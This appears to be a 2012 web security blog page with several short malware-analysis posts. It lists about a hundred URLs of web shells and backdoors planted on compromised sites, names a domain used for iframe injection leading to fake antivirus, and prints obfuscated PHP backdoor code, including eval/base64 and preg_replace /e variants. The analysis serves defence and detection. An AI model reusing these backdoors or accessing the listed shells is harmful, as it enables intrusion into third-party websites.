http://picasa.com.moveissantafe.com/yahoo.php http://picasa.communication.fees.cl/2.php http://picasa.communication.mintweb.dk/2.php http://picasa.communication.mushindojo-bistrita.ro/wp.php http://picasa.communication.ventasexclusivas.cl/2.php http://picasa.com.nieca.com/rabot.php http://picasa.com.pakarwebsite.com/xpl/yahoo.php http://picasa.com.playteck.net/spread.php http://picasa.com.portobello.com.au/cybercrime.php http://picasa.com.portobello.com.au/phantom.php http://picasa.com.prisonbucket.com/itel.php http://picasa.com.prodajpricu.com/index.php http://picasa.com.reginaalcalde.cl/contents/bob.php http://picasa.com.reginaalcalde.cl/contents/count.php http://picasa.com.sharmilas.co.uk/pl.php http://picasa.com.sigeart.com/wp-content/images/soul.php http://picasa.comsing.nazuka.net/sing.php http://picasa.com.snap-u.com/yahoo.php http://picasa.com.toldgomes.pt/both.php http://picasa.com.toldgomes.pt/nina.php http://picasa.com.toldgomes.pt/nin.php http://picasa.com.tomi.com.au/logs/404.php http://picasa.com.tomi.com.au/logs/kacuk.php http://picasa.com.tomi.com.au/logs/shell.php http://picasa.com.tomi.com.au/logs/xcyb.php http://picasa.com.truephenomenon.com/cybercrime.php http://picasa.com.urix.cl/cgi-bin.php http://picasa.com.uslulaw.com/menu.php http://picasa.com.utalent.org/itel.php http://picasa.com.utalent.org/service/hsdv.php http://picasa.com.webbmotellet.se/count.php http://picasa.com.welitonmaia.com.br/bot.php http://picasa.com.welitonmaia.com.br/sh.php http://picasa.com.welitonmaia.com.br/xx.php http://picasa.com.wesmira.com/injekan.php http://picasa.com.xpl.be/yahoo.php http://picasa.com.yenisahne.com/cybercrime.php http://picasa.com.zlinkerparts.com/yahoo.php http://picasa.dairi-online.org/ho1onk.php http://pitfoto.eu/wp-content/themes/kingsize/images/gallery/login.php http://procmocoescielo.com.br/timthumb/ikhy.php http://procmocoescielo.com.br/timthumb/login.php http://shinnongclinic.com/kor_board/icon/member_image_box/1/pl.php http://tokokuepondokhijau.com/wp-admin/js/ikhy.php http://tokokuepondokhijau.com/wp-admin/js/login.php http://womenmagazine.pp.ua//read.php http://wordpress.com.acadteam.com/eva.php http://wordpress.com.airatrip.com/temp/dapetsatu.php http://wordpress.com.airatrip.com/temp/icon.php http://wordpress.com.airatrip.com/temp/phantom.php http://wordpress.com.cctvnoida.in/cache.php http://wordpress.com.cobrerodas.com.br/wp-reson.php http://wordpress.com.defacer007.tk/juned.php http://wordpress.com.defacer007.tk/junedz.php http://wordpress.com.en-nur.at/injekan.php http://wordpress.com.en-nur.at/probot.php http://wordpress.com.framarservices.com/ecommerce/imp/userfiles/mods/sh.php http://wordpress.com.hostdail.com/bot.php http://wordpress.com.hostdail.com/logs/logs.php http://wordpress.com.junglerumblepartyvenue.co.za/index.php http://wordpress.company.clubmarutichile.cl/2.php http://wordpress.company.draadrianacampos.com.br/2.php http://wordpress.company.newconstructionadvice.com/2.php http://wordpress.company.provinciadelhuasco.cl/2.php http://wordpress.company.smiledesignofutah.com/wp.php http://wordpress.company.veterangalleri.dk/3.php http://wordpress.com.prolinkirc.org/index6.php http://wordpress.com.quick-life.com/bot.php http://wordpress.com.shootarget.com/eva.php http://wordpress.com.sleepyvillage.ca/indeks.php http://wordpress.com.xanapa.au.com/xanyn.php http://wordpress.com.xanyko.in/xanyn.php http://www.antiguadecor.com/livehelp/include/count.php http://www.beachsoccerzeeland.nl/nitrouse/clear-all.php http://www.bikinisnz.com/ikhy.php http://www.bikinisnz.com/login.php http://www.blogger.com.exl.ro/max/login.php http://www.comositas.com/wp/asu/ikhy.php http://www.comositas.com/wp/asu/login.php http://www.computationalcenter.com.ar/images/google/ikhy.php http://www.computationalcenter.com.ar/images/google/login.php http://www.diendanceo.vn/diendan.matbaoad.com/logs.jpg http://www.edermeneghine.com.br/consultoria///wp-admin/images/css/admin-bar.dev.css http://www.effectuslifestyle.com//wp-admin/logs/auto http://www.flickr.com.katiechaophoto.com/htacess.php http://www.flickr.com.querominhalojananet.com.br/htacess.php http://www.flickr.com.turuzzonatale.it/htacess.php http://www.hizb.org.uk/mint/ikhy.php http://www.hizb.org.uk/mint/login.php http://www.jayneskitschen.co.uk/blog/tmp/cache/linkshell.txt? http://www.kinecat.pl/shx http://www.picasa.com.borgonicoletta.it/silet.php http://www.picasa.com.ekoproject.it/yamaha.php http://www.picasa.com.theblueoblique.com/eat.php http://www.picasa.com.tunc.tk/malas.php http://www.poppylou.com.au/spread.php http://www.prosnow.pl/wp-includes/xhtml/query.php http://www.prosnow.pl/wp-includes/xhtml/quota.php http://www.purplepeppa.co.uk/cart/images/byroe.php http://www.seoulaoi.com/bbs/icon/Home/load.php http://www.wendyswebpagedesign.com/wp-admin/maint/numpang/ikhy.php http://www.wendyswebpagedesign.com/wp-admin/maint/numpang/login.php

And most of them are still live. If you download them you will see many backdoor variations:

if (isset($lol)) { eval ( gzinflate(base64_decode("pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe..

And we will keep monitoring them.

Iframes from lowresolutionit.in

Published: 2012-05-25  by  Daniel B. Cid

Seeing many sites compromised with an iframe pointing to http://lowresolutionit.in/in.cgi?6, mostly on outdated WordPress. That domain is currently redirecting to http://hewjzkgvkhwec.tk/27973751.html and then to fake AV.

Backdoor: Contact1

Published: 2012-05-24  by  Daniel B. Cid

Magno (from our support team ) found this pretty backdoor on a compromised site. As we keep saying, just searching for evals + base64_decode wouldn't cut anymore.

*If you enjoy decoding backdoors, please try this one and send the results to jobs@sucuri.net :) $hlD='iDK'.sGVMQ7;$Uh='mw~g~{~te}o'&movg.'~{'.jwuko;$NWAAkzdZp3E=')!@'|"*\$B";'gqHK'. 'S0q?E,P;D';$Sfp4z_wg='[@e+v8'^'xd%n8^';$G99ZRs=rqyM_.'|'.ceRQ.'.bJC'|'Cr-!J=4'. '" Olu& ';$hEg='$7.5XB; "D!5'|'!86!jP8 "P=*';$tUCPwKkMT9='4~j{'.bsmrr.'^`s'^#M'. 'a31)GS3"<k>)';$ABFU=GvinYpovtk."}iN_?w=f}>}nhp/=YG+^]`".dnmw&'trM/u?wkV:}[Rw/'. 's}&3:?'.hmYo.'}'.iRw_e9vnMw;$YhV="/[eU_"&'>{wu]';$QwdOlaBF='.'&n;$tD='^mw'&/*'. '+r7wsL*/fAw;$lc2dKfnyr='tau}l~'&ootgkv;$uB785Xk0='vb)7|'^'>6}g#';$LcLj="9"^/*'. '+_4MR0t<*/x;$_B=w&c;$oNP0EeIWkLS=syu&wio;$iDuSaXky6Y=LTUT_X&z_TY_.'{';'ODO4Zg'. 'mOZL<Fh0^';$JKDCVF98X='>b{,~s'^'a,>x!:';$g0Vp="?("^qn;$bfv=G|H;$FPMf=('~ew}nw'. '|}u}o'&'~gw}nw~|g{n')&$Uh;$NRKZ54=$tD^$NWAAkzdZp3E;$EJzYkUOU=$Sfp4z_wg|/*tsRq'. 'Rm-bWx~*/$lc2dKfnyr;$WrVZ9W=$G99ZRs&(JaLlV4ruBUSuko|'kLl*'._QqH2O4.'@oj');'A4'. '7rL';$ek1OUNY=$hEg^$tUCPwKkMT9;$E5TeI6U=('%1x_r^1'.Z0iL.'~'.huuslyV.#WWqJtW7c'. '~]3.>'.lVz7Vm.')Z>){~'&'as~E:~3'.W6oM.'>4'.leKeqON.'{|g}^'.Txvh.'|)z>{}J')^/*'. '&*/$ABFU;if($FPMf($NRKZ54($EJzYkUOU($uB785Xk0.$LcLj)),(lTRiTPX.'@'.XZIU.#rkpu'. ']jtb<'.W2ZU^'Zdf[`an"oi('.ehSFZ.'^'.oP8f).(' ""1b"088b'|"46B(".D4400b).$_B))/*'. '(8=*/exit;$WrVZ9W($ek1OUNY,$YhV.$QwdOlaBF.$oNP0EeIWkLS,$EJzYkUOU(/*pu9nkGmceX'. 'M9La;DNb,**/$iDuSaXky6Y.$JKDCVF98X.$g0Vp.$bfv),$E5TeI6U);#~CTu8z)O?=2?y]!HKZ'. 'nf(vKmSV>e_Za[d|qeA)hw_baI^^@Z}N!rPq5tBV^u';
Yes, that's all for the backdoor.

Backdoor: preg_replace

Published: 2012-05-21  by  Daniel B. Cid

Another interesting backdoor:

<?php $ncww = "e/*./"; preg_replace(strrev($ncww),"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'rVkJc+JG0/4rxLW1Nl8cr0YHoHi1Lz7AxmvwawwY2GxRgMQpjkJiOTb737+e7pmROLxJKm8SS2Km55m+u2cy7CXOfuktp91wOJu2vPUwCIOz00LhNJlMfE/IiUShcPZumPz+ru1cLRbtzdnpaeLitPJqp9qva/4ZNF4y2uPoin/3P9/xV+lbp87f1/wx4A/3zuevYeeuyt/pQo6/WOWlWu3zr6cbc/XEPzbX9farNeafHcPdFnJWtXDbWBZvxs7pOW7d1fkzP+HPJn/UbP4MO3rZB5KOcY1bdfjDt4f81aiX8FcTufM3QNa+559...
You may not be aware, but the preg_replace function with the "e" parameter, allows full code execution (eval). When you transform the hex chars, you get "eval ( gzinflate ( base64_decode ( " which runs all the code in the long block of characters inside the preg_replace.